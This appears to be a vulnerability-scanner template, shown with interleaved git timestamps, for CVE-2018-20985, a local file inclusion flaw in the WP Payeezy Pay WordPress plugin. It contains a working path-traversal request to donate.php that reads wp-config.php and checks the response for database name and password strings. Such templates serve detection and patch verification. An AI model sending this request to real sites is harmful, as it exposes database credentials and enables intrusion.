2021-07-22 08:35:12 +00:00
id : CVE-2018-20985
info :
2022-05-13 20:26:43 +00:00
name : WordPress Payeezy Pay <=2.97 - Local File Inclusion
2021-07-22 08:35:12 +00:00
author : daffainfo
2022-04-22 10:38:41 +00:00
severity : critical
2022-05-13 20:26:43 +00:00
description : WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.
2023-09-27 15:51:13 +00:00
impact : |
The vulnerability allows an attacker to include local files and execute arbitrary code on the server.
2023-09-06 12:57:14 +00:00
remediation : |
Update to the latest version of WordPress Payeezy Pay plugin.
2021-08-18 11:37:49 +00:00
reference :
2021-07-22 08:37:50 +00:00
- https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/
2022-05-13 20:26:43 +00:00
- https://wordpress.org/plugins/wp-payeezy-pay/#developers
2022-09-23 17:53:08 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-20985
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-20985
cwe-id : CWE-20
2024-01-14 13:49:27 +00:00
epss-score : 0.0117
epss-percentile : 0.83424
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:a:payeezy:wp_payeezy_pay:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : payeezy
product : wp_payeezy_pay
2023-09-06 12:57:14 +00:00
framework : wordpress
2023-12-05 09:50:33 +00:00
tags : cve,cve2018,wordpress,lfi,plugin,payeezy
2021-07-22 08:35:12 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-22 08:35:12 +00:00
- method : POST
path :
- "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"
2021-07-22 13:31:00 +00:00
body : "x_login=../../../wp-config"
2021-07-22 08:35:12 +00:00
matchers-condition : and
matchers :
2021-07-22 12:32:43 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-07-22 12:32:43 +00:00
words :
2021-07-22 13:31:00 +00:00
- "The base configuration for WordPress"
- "define( 'DB_NAME',"
- "define( 'DB_PASSWORD',"
condition : and
2023-07-11 19:49:27 +00:00
2021-07-22 08:35:12 +00:00
- type : status
status :
- 200
2024-01-14 14:05:19 +00:00
# digest: 4a0a0047304502210092d1308e433baff690e557d18a8af6366d00edc890c8a59ea8cd427086bd4565022042b1cd97339987d725556c532c21c46fcd54605e4c86b34f091a37b5e6db2781:922c64590222798bb761d5b6d8e72950